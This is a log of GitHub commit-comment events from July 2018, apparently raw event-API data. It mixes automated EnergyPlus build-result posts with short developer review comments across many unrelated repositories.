{"id":"8041053311","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29896152,"position":null,"line":null,"path":null,"commit_id":"bf4326d4d97c3998c3771ff367df43740c184baf","created_at":"2018-07-31T00:37:20Z","updated_at":"2018-07-31T00:37:20Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T00:37:20Z"}
{"id":"8041053492","type":"CommitCommentEvent","actor":{"login":"AJMFactsheets"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":29896153,"position":null,"line":null,"path":null,"commit_id":"fb19b8c1c1ea6a0ffe3d8ef73063a568271a780b","created_at":"2018-07-31T00:37:24Z","updated_at":"2018-07-31T00:37:24Z","author_association":"NONE","body":"I know this is a simple patch, but thanks for removing this annoying bug quicker than Mojang would ever. 👍 "}},"created_at":"2018-07-31T00:37:24Z"}
{"id":"8041061758","type":"CommitCommentEvent","actor":{"login":"AzGilrock"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29896176,"position":null,"line":null,"path":null,"commit_id":"c0620268f2b59bb63959f73478091938ad0eee0b","created_at":"2018-07-31T00:40:21Z","updated_at":"2018-07-31T00:40:21Z","author_association":"COLLABORATOR","body":"Yes I checked an older version also.  I didn't dig into it I just thought at first glance of the code it was going to prefix it.  Not a big deal for me the way I allocate mine I pretty much have to type all of them anyways."}},"created_at":"2018-07-31T00:40:21Z"}
{"id":"8041062591","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29896179,"position":1,"line":419,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"e55dcc03ab2d880e9f805efad06acc66086d5f49","created_at":"2018-07-31T00:40:38Z","updated_at":"2018-07-31T00:40:38Z","author_association":"OWNER","body":"@TomRust A few comments for lines above:\r\n\r\nLine 356 - what is the \"baseline rate\"\r\nLine 369 - check the language about \"reliably estimated\" versus \"cannot be measured\" \r\nLine 372 - define \"initialization\"\r\nLine 392 - language from data UI/model parameters needs to be added\r\nLine 401-407 - Really need that sensitivity test language standardized, simplified, while also being adequately defined.\r\nLine 414 - Can we explain what \"Endogenously generated\" means?"}},"created_at":"2018-07-31T00:40:38Z"}
{"id":"8041067134","type":"CommitCommentEvent","actor":{"login":"asterite"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":29896194,"position":null,"line":null,"path":null,"commit_id":"2703311232467767144ca7f83196c0e6fe4d24b4","created_at":"2018-07-31T00:42:22Z","updated_at":"2018-07-31T00:42:22Z","author_association":"CONTRIBUTOR","body":"What happens if size is a very big negative, bigger than bytesize? "}},"created_at":"2018-07-31T00:42:22Z"}
{"id":"8041072489","type":"CommitCommentEvent","actor":{"login":"dtschmitz"},"repo":{"name":"RetroShare/RetroShare"},"payload":{"comment":{"id":29896212,"position":null,"line":null,"path":null,"commit_id":"1297d2e1068e165fb894a94d38b335da623af09a","created_at":"2018-07-31T00:44:20Z","updated_at":"2018-07-31T00:44:20Z","author_association":"NONE","body":"Most excellent.  Kudos to @SSS !!"}},"created_at":"2018-07-31T00:44:20Z"}
{"id":"8041074131","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29896216,"position":null,"line":null,"path":null,"commit_id":"34a0f8f3430d7061c304a7882904b6b8a69abd20","created_at":"2018-07-31T00:44:58Z","updated_at":"2018-07-31T00:44:58Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (vidanovic) - x86_64-MacOS-10.9-clang: OK (2959 of 2959 tests passed, 2 test warnings)\n\nMessages:\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T00:44:58Z"}
{"id":"8041083371","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29896233,"position":9,"line":529,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"10bfa88283b20bb1d9f79688b886437cf51f77ba","created_at":"2018-07-31T00:48:18Z","updated_at":"2018-07-31T00:48:18Z","author_association":"OWNER","body":"@TomRust Add from the data UI/ModelParameters standard definitions"}},"created_at":"2018-07-31T00:48:18Z"}
{"id":"8041086974","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29896247,"position":101,"line":645,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"10bfa88283b20bb1d9f79688b886437cf51f77ba","created_at":"2018-07-31T00:49:32Z","updated_at":"2018-07-31T00:49:32Z","author_association":"OWNER","body":"@TomRust @holbrooa Do we need this here in the CC model?  In an earlier line, I recommended that we edit out the description of groups, since that's only covered in Agg."}},"created_at":"2018-07-31T00:49:32Z"}
{"id":"8041087347","type":"CommitCommentEvent","actor":{"login":"shayanb"},"repo":{"name":"lorenzb/libsubmarine"},"payload":{"comment":{"id":29896253,"position":null,"line":null,"path":null,"commit_id":"6595ea35e5f00f9dab26b038859556ec40e7115d","created_at":"2018-07-31T00:49:41Z","updated_at":"2018-07-31T00:49:41Z","author_association":"NONE","body":"@relyt29 Any specific reason for removing `generate_commitment/requirements.txt`? "}},"created_at":"2018-07-31T00:49:41Z"}
{"id":"8041091552","type":"CommitCommentEvent","actor":{"login":"tdaede"},"repo":{"name":"tdaede/rd_tool"},"payload":{"comment":{"id":29896270,"position":84,"line":271,"path":"rd_server.py","commit_id":"3fbc7f663b36c004421deace5e457e8c359ebed5","created_at":"2018-07-31T00:51:11Z","updated_at":"2018-07-31T00:51:11Z","author_association":"OWNER","body":"Hmm, if machines actually fail the work should fail eventually due to dropping the ssh connection, and the work get restarted."}},"created_at":"2018-07-31T00:51:11Z"}
{"id":"8041101226","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29896297,"position":37,"line":679,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"0a9b5e54e38107287f877d506c88af75480d2168","created_at":"2018-07-31T00:54:52Z","updated_at":"2018-07-31T00:54:52Z","author_association":"OWNER","body":"@TomRust Some parts of this are very clear (well-defined), but let's still consider this another sensitivity test for which we'd like to standardize the description."}},"created_at":"2018-07-31T00:54:52Z"}
{"id":"8041101417","type":"CommitCommentEvent","actor":{"login":"dkulp"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29896299,"position":null,"line":null,"path":null,"commit_id":"c0620268f2b59bb63959f73478091938ad0eee0b","created_at":"2018-07-31T00:54:58Z","updated_at":"2018-07-31T00:54:58Z","author_association":"COLLABORATOR","body":"The method is poorly named... Didn't realize this is ONLY used to calculate default string start channels when first clicking on the \"Indiv Start Chans\" checkbox.     That said, there is an issue with it as it always calculated based on the start channel of the FIRST string, not the last string.  For example, if you have a 12 string tree with individual start channels (big gaps between strings) and then increase to 14 strings, the two new strings will likely overlap existing strings."}},"created_at":"2018-07-31T00:54:58Z"}
{"id":"8041101481","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29896300,"position":null,"line":null,"path":null,"commit_id":"48aaeaa7608dde147070769003e4e533f0a94a2a","created_at":"2018-07-31T00:54:59Z","updated_at":"2018-07-31T00:54:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement Request DOA](https://trello.com/c/9EyvC0sF/14-implement-request-doa)"}},"created_at":"2018-07-31T00:54:59Z"}
{"id":"8041101609","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29896301,"position":null,"line":null,"path":null,"commit_id":"a3282a6ba9b6fcca5ee426c21250dec10916b166","created_at":"2018-07-31T00:55:03Z","updated_at":"2018-07-31T00:55:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement Request DOA](https://trello.com/c/9EyvC0sF/14-implement-request-doa)"}},"created_at":"2018-07-31T00:55:03Z"}
{"id":"8041102701","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29896303,"position":12,"line":25,"path":"src/api/java/thaumcraft/api/research/IScanThing.java","commit_id":"ac145872c7a4b18d6d5c3a3e77b84987e8222c1b","created_at":"2018-07-31T00:55:27Z","updated_at":"2018-07-31T00:55:27Z","author_association":"MEMBER","body":"Wow, never thought idea would format these stupid files when it optimize code for the whole project"}},"created_at":"2018-07-31T00:55:27Z"}
{"id":"8041107458","type":"CommitCommentEvent","actor":{"login":"xGeneralMetalx"},"repo":{"name":"Wutname1/SpartanUI"},"payload":{"comment":{"id":29896317,"position":null,"line":null,"path":null,"commit_id":"995734802455ae41280c0e963776966c01ca4339","created_at":"2018-07-31T00:57:22Z","updated_at":"2018-07-31T00:57:22Z","author_association":"NONE","body":"Gonna give this a try. Thank you for your time on this.\r\n"}},"created_at":"2018-07-31T00:57:22Z"}
{"id":"8041109808","type":"CommitCommentEvent","actor":{"login":"CapgeminiMarcus"},"repo":{"name":"AppliedInsightsFoundry/JavaScript"},"payload":{"comment":{"id":29896321,"position":null,"line":null,"path":null,"commit_id":"8982459da32f5d59ea4897dcd8bc95098ad868c2","created_at":"2018-07-31T00:58:20Z","updated_at":"2018-07-31T00:58:20Z","author_association":"COLLABORATOR","body":"Index.htm & contentful_item.htm are the two files with JavaScript that connects AIF to the CMS"}},"created_at":"2018-07-31T00:58:20Z"}
{"id":"8041112651","type":"CommitCommentEvent","actor":{"login":"jwill2385"},"repo":{"name":"droid-squad/Natville"},"payload":{"comment":{"id":29896329,"position":null,"line":null,"path":null,"commit_id":"238636d9c87e53a7db7c11d5882f9d35c7c750ad","created_at":"2018-07-31T00:59:26Z","updated_at":"2018-07-31T00:59:26Z","author_association":"CONTRIBUTOR","body":"![screenshot_20180730-175759_hikernation](https://user-images.githubusercontent.com/40250274/43431344-4b0d0fd4-9422-11e8-9e82-7aecdc025802.jpg)\r\n"}},"created_at":"2018-07-31T00:59:26Z"}
{"id":"8041121082","type":"CommitCommentEvent","actor":{"login":"nicktimko"},"repo":{"name":"takluyver/flit"},"payload":{"comment":{"id":29896349,"position":5,"line":127,"path":"flit/validate.py","commit_id":"d75f367ec8a79fc948f5dabe33e16a27ffeb2232","created_at":"2018-07-31T01:02:35Z","updated_at":"2018-07-31T01:02:35Z","author_association":"NONE","body":"What's this do?"}},"created_at":"2018-07-31T01:02:35Z"}
{"id":"8041127513","type":"CommitCommentEvent","actor":{"login":"amay077"},"repo":{"name":"MicrosoftDocs/xamarin-docs.ja-jp"},"payload":{"comment":{"id":29896375,"position":303,"line":19,"path":"docs/android/user-interface/material-theme.md","commit_id":"2bc55c670a0a00c20a66ac5da473f2b5eddc2c02","created_at":"2018-07-31T01:05:11Z","updated_at":"2018-07-31T01:05:11Z","author_association":"CONTRIBUTOR","body":"Why reverted?"}},"created_at":"2018-07-31T01:05:11Z"}
{"id":"8041127733","type":"CommitCommentEvent","actor":{"login":"CarelineJimmyLee"},"repo":{"name":"xenophon566/NewStart"},"payload":{"comment":{"id":29896376,"position":6,"line":24,"path":"src/app/heroes/heroes/heroes.component.ts","commit_id":"bd4fd7b5a4c720ffacd51cacaea116bc8a42e4a3","created_at":"2018-07-31T01:05:16Z","updated_at":"2018-07-31T01:05:16Z","author_association":"NONE","body":"Q:\b若是不透過`document.getElementById`去取得 DOM元素，在Angular裡有什麼方式可以去存取呢\r\n可參考\r\nhttps://www.google.com.tw/search?q=angular+subject\r\nhttps://www.google.com.tw/search?q=angular+share+service"}},"created_at":"2018-07-31T01:05:16Z"}
{"id":"8041129126","type":"CommitCommentEvent","actor":{"login":"dyzz"},"repo":{"name":"UnitedBitcoin/electrum"},"payload":{"comment":{"id":29896380,"position":5,"line":108,"path":"lib/bitcoin.py","commit_id":"20c0ae903ed9ba1ebbaebebe6d348537c319189b","created_at":"2018-07-31T01:05:49Z","updated_at":"2018-07-31T01:05:49Z","author_association":"NONE","body":"is it a typo? should be 7200"}},"created_at":"2018-07-31T01:05:49Z"}
{"id":"8041133822","type":"CommitCommentEvent","actor":{"login":"Larrymuers"},"repo":{"name":"jlevy/the-art-of-command-line"},"payload":{"comment":{"id":29896387,"position":null,"line":null,"path":null,"commit_id":"1f0bbc72cb46c5740292e1f8e8285a008cca9e08","created_at":"2018-07-31T01:07:32Z","updated_at":"2018-07-31T01:07:32Z","author_association":"NONE","body":"142+"}},"created_at":"2018-07-31T01:07:32Z"}
{"id":"8041137429","type":"CommitCommentEvent","actor":{"login":"Larrymuers"},"repo":{"name":"jlevy/the-art-of-command-line"},"payload":{"comment":{"id":29896400,"position":2,"line":66,"path":"AUTHORS.md","commit_id":"1f0bbc72cb46c5740292e1f8e8285a008cca9e08","created_at":"2018-07-31T01:08:52Z","updated_at":"2018-07-31T01:08:52Z","author_association":"NONE","body":"Alan Brogan (jalanb)](https://github.com/jalanb) "}},"created_at":"2018-07-31T01:08:52Z"}
{"id":"8041138147","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29896403,"position":null,"line":null,"path":null,"commit_id":"c66861d7cbfc64eb7c137c97b89630ad44d8e140","created_at":"2018-07-31T01:09:10Z","updated_at":"2018-07-31T01:09:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [048 - Desenvolver Classe Endereco Service](https://trello.com/c/h9cOTjR0/56-048-desenvolver-classe-endereco-service)"}},"created_at":"2018-07-31T01:09:10Z"}
{"id":"8041139516","type":"CommitCommentEvent","actor":{"login":"rickardoberg"},"repo":{"name":"neo4j/neo4j"},"payload":{"comment":{"id":29896405,"position":15,"line":432,"path":"community/io/src/main/java/org/neo4j/io/pagecache/impl/muninn/MuninnPageCursor.java","commit_id":"c86c236cb6a614e6cf024340b64b6ad181f22a7b","created_at":"2018-07-31T01:09:39Z","updated_at":"2018-07-31T01:09:39Z","author_association":"CONTRIBUTOR","body":"This seems to be missing a null check"}},"created_at":"2018-07-31T01:09:39Z"}
{"id":"8041142374","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29896416,"position":null,"line":null,"path":null,"commit_id":"bf4326d4d97c3998c3771ff367df43740c184baf","created_at":"2018-07-31T01:10:41Z","updated_at":"2018-07-31T01:10:41Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1697 of 1704 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 652\n * OTHER_FAULT: 7\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.59%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-39.74%25-green.png)</a>\n"}},"created_at":"2018-07-31T01:10:41Z"}
{"id":"8041144886","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29896425,"position":null,"line":null,"path":null,"commit_id":"377785e6b9a5142ac8b4ad6e33c55862dad1c9c9","created_at":"2018-07-31T01:11:35Z","updated_at":"2018-07-31T01:11:35Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (lgu1234) - Win64-Windows-7-VisualStudio-14: OK (2953 of 2953 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-377785e6b9a5142ac8b4ad6e33c55862dad1c9c9-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-377785e6b9a5142ac8b4ad6e33c55862dad1c9c9-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T01:11:35Z"}
{"id":"8041146987","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29896432,"position":1,"line":null,"path":"1532999538.06/github_test.txt","commit_id":"08f98942fcfd399c29f6e9f112efec90f91c937e","created_at":"2018-07-31T01:12:20Z","updated_at":"2018-07-31T01:12:20Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-31T01:12:20Z"}
{"id":"8041157157","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29896452,"position":null,"line":null,"path":null,"commit_id":"b7d1eab2c735ec9bba6cb82c649b20b440028c19","created_at":"2018-07-31T01:15:50Z","updated_at":"2018-07-31T01:15:50Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement Request DOA](https://trello.com/c/9EyvC0sF/14-implement-request-doa)"}},"created_at":"2018-07-31T01:15:50Z"}
{"id":"8041157255","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29896453,"position":null,"line":null,"path":null,"commit_id":"b7d1eab2c735ec9bba6cb82c649b20b440028c19","created_at":"2018-07-31T01:15:52Z","updated_at":"2018-07-31T01:15:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement Request DOA](https://trello.com/c/9EyvC0sF/14-implement-request-doa)"}},"created_at":"2018-07-31T01:15:52Z"}
{"id":"8041182941","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29896516,"position":null,"line":null,"path":null,"commit_id":"5423618217002d7a4b63ee843d08df79354bcd31","created_at":"2018-07-31T01:24:32Z","updated_at":"2018-07-31T01:24:32Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T01:24:32Z"}
{"id":"8041185552","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"ShardeDeLane/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29896520,"position":null,"line":null,"path":null,"commit_id":"1acdb5af27ff151b2664e0f304ae36e4b7ce2dfc","created_at":"2018-07-31T01:25:27Z","updated_at":"2018-07-31T01:25:27Z","author_association":"NONE","body":"Great job getting the general style down for the amount of time you had. One piece of advice I would give you is to make more commits for documentation of progress and in case anything were to break. "}},"created_at":"2018-07-31T01:25:27Z"}
{"id":"8041187064","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29896525,"position":null,"line":null,"path":null,"commit_id":"9dd77d700589c25a95282230853bfdaeb18db2e9","created_at":"2018-07-31T01:26:00Z","updated_at":"2018-07-31T01:26:00Z","author_association":"MEMBER","body":"This is not really how you do things consider the tool we're using...."}},"created_at":"2018-07-31T01:26:00Z"}
{"id":"8041187351","type":"CommitCommentEvent","actor":{"login":"ilqarilyasov"},"repo":{"name":"LambdaSchool/SwiftStrings"},"payload":{"comment":{"id":29896528,"position":3,"line":3,"path":"README.md","commit_id":"59699cae5cc102966798d8f9e7853da45a5a1f7f","created_at":"2018-07-31T01:26:07Z","updated_at":"2018-07-31T01:26:07Z","author_association":"NONE","body":"When they tap the button, **you're** / your"}},"created_at":"2018-07-31T01:26:07Z"}
{"id":"8041192456","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29896539,"position":61,"line":413,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"434a0d173c451cafa6815aca8d0093f7724f66d7","created_at":"2018-07-31T01:27:56Z","updated_at":"2018-07-31T01:27:56Z","author_association":"COLLABORATOR","body":"Your guess is good as mine. I think we might need to split this file into modules. \r\n\r\nYour guess is a good as mine.  \r\n\r\nOn another note we need to split this file up. I have a huge merge ahead of me as I have several hundred lines of new source that I can't push into the main tree now..."}},"created_at":"2018-07-31T01:27:56Z"}
{"id":"8041195581","type":"CommitCommentEvent","actor":{"login":"caseygreenlee52"},"repo":{"name":"ky-is/td"},"payload":{"comment":{"id":29896541,"position":null,"line":null,"path":null,"commit_id":"f3dd7f8c73ae8cc9e35b55f0d14f9c64ea270b7e","created_at":"2018-07-31T01:29:02Z","updated_at":"2018-07-31T01:29:02Z","author_association":"NONE","body":"I'm looking to create a while if I heart coin, if anybody know how to can you please let me know as soon as possible. Thanks"}},"created_at":"2018-07-31T01:29:02Z"}
{"id":"8041198759","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29896554,"position":10,"line":11,"path":"src/login/index.html","commit_id":"9dd77d700589c25a95282230853bfdaeb18db2e9","created_at":"2018-07-31T01:30:09Z","updated_at":"2018-07-31T01:30:09Z","author_association":"MEMBER","body":"include this piece of code in the app.js, then inline using plugin should be the right way, if u want to inline...."}},"created_at":"2018-07-31T01:30:09Z"}
{"id":"8041204247","type":"CommitCommentEvent","actor":{"login":"javierpuentes"},"repo":{"name":"Monaguillo/SRD"},"payload":{"comment":{"id":29896574,"position":null,"line":null,"path":null,"commit_id":"b0a53b4abcec02e20d7d9338163322ab0110083c","created_at":"2018-07-31T01:31:59Z","updated_at":"2018-07-31T01:31:59Z","author_association":"NONE","body":"[ERD SDR.pdf](https://github.com/Monaguillo/SRD/files/2243398/ERD.SDR.pdf)\r\nDiagrama inicial de la base de datos "}},"created_at":"2018-07-31T01:31:59Z"}
{"id":"8041205664","type":"CommitCommentEvent","actor":{"login":"hbbdyzf"},"repo":{"name":"gBringout/SphericalHarmonics"},"payload":{"comment":{"id":29896584,"position":null,"line":null,"path":null,"commit_id":"a4c9e4491d7491d2fed2a983f757a1e84ebc396c","created_at":"2018-07-31T01:32:27Z","updated_at":"2018-07-31T01:32:27Z","author_association":"NONE","body":"Thank you for your answer! \r\n          I will do a test. \r\n          I am doing a shimming calculation which is calculated by using spherical harmonic function. I am looking for a good way to deal with normalization of legendre."}},"created_at":"2018-07-31T01:32:27Z"}
{"id":"8041212227","type":"CommitCommentEvent","actor":{"login":"thiagoalves"},"repo":{"name":"inspira/tunnel-apple"},"payload":{"comment":{"id":29896596,"position":5,"line":11,"path":"Demo/BasicTunnel-iOS/BasicTunnel-iOS.entitlements","commit_id":"2140ec644aff49f70bd7525ee488ecf819cf1bc6","created_at":"2018-07-31T01:34:42Z","updated_at":"2018-07-31T01:34:42Z","author_association":"MEMBER","body":"@leofukui We need to revert back this change"}},"created_at":"2018-07-31T01:34:42Z"}
{"id":"8041212470","type":"CommitCommentEvent","actor":{"login":"thiagoalves"},"repo":{"name":"inspira/tunnel-apple"},"payload":{"comment":{"id":29896597,"position":10,"line":15,"path":"Demo/BasicTunnel-iOS/BasicTunnel-iOS.entitlements","commit_id":"2140ec644aff49f70bd7525ee488ecf819cf1bc6","created_at":"2018-07-31T01:34:47Z","updated_at":"2018-07-31T01:34:47Z","author_association":"MEMBER","body":"@leofukui Same here"}},"created_at":"2018-07-31T01:34:47Z"}
{"id":"8041220063","type":"CommitCommentEvent","actor":{"login":"RekongRabten"},"repo":{"name":"Esukhia/derge-kangyur"},"payload":{"comment":{"id":29896611,"position":5,"line":3928,"path":"derge-kangyur-tags/008-tagged.txt","commit_id":"e9894f066f4d3f155f65df9b56c95bfadf2e52e0","created_at":"2018-07-31T01:37:36Z","updated_at":"2018-07-31T01:37:36Z","author_association":"NONE","body":"དགོངས་དག གློག་ཀླད་འགགས་ཏེ་མནན་ནོར་ཤོར་བས་   ྱིས་འདི་གསུབ་འདུག་པས་བཟོ་བཅོས་བྱས་ཡོད། ཐུགས་རྗེ་ཆེ། "}},"created_at":"2018-07-31T01:37:36Z"}
{"id":"8041220372","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29896612,"position":null,"line":null,"path":null,"commit_id":"5423618217002d7a4b63ee843d08df79354bcd31","created_at":"2018-07-31T01:37:42Z","updated_at":"2018-07-31T01:37:42Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T01:37:42Z"}
{"id":"8041222876","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29896619,"position":8,"line":9,"path":"src/login/index.html","commit_id":"9dd77d700589c25a95282230853bfdaeb18db2e9","created_at":"2018-07-31T01:38:33Z","updated_at":"2018-07-31T01:38:33Z","author_association":"MEMBER","body":"there's too many request, it's no longer effective to construct the cryptojs via third-party-cdn just to save our own network traffic, consider the high delay and chance to fail on any, it's better to bundle it."}},"created_at":"2018-07-31T01:38:33Z"}
{"id":"8041225606","type":"CommitCommentEvent","actor":{"login":"khos2ow"},"repo":{"name":"cloudops/cca-website"},"payload":{"comment":{"id":29896629,"position":2,"line":1,"path":"themes/cca-general/layouts/partials/homepage/intro-card.html","commit_id":"a30c6283c3a0bbb9531b9b5e52d4a3cfd38079f6","created_at":"2018-07-31T01:39:36Z","updated_at":"2018-07-31T01:39:36Z","author_association":"CONTRIBUTOR","body":"@Cdaoustd I wanted to point out that you renamed this file and forgot to adjust its reference in `themes/cca-general/layouts/index.html#10`.\r\nThis might be a very good reason (practice) to use pull requests extensively, even if you're working on your own project on your own repo. I mean you can always fix a PR, as much as you'd like, without adding _extra noise_ in master's git history."}},"created_at":"2018-07-31T01:39:36Z"}
{"id":"8041225934","type":"CommitCommentEvent","actor":{"login":"Tonymac32"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29896631,"position":null,"line":null,"path":null,"commit_id":"ba6b764702254e147f77090b796bbdc476f89f1c","created_at":"2018-07-31T01:39:44Z","updated_at":"2018-07-31T01:39:44Z","author_association":"MEMBER","body":"I'm looking into it, alternating with what I can get working on 4.18 coming up to prepare for the next LTS kernel"}},"created_at":"2018-07-31T01:39:44Z"}
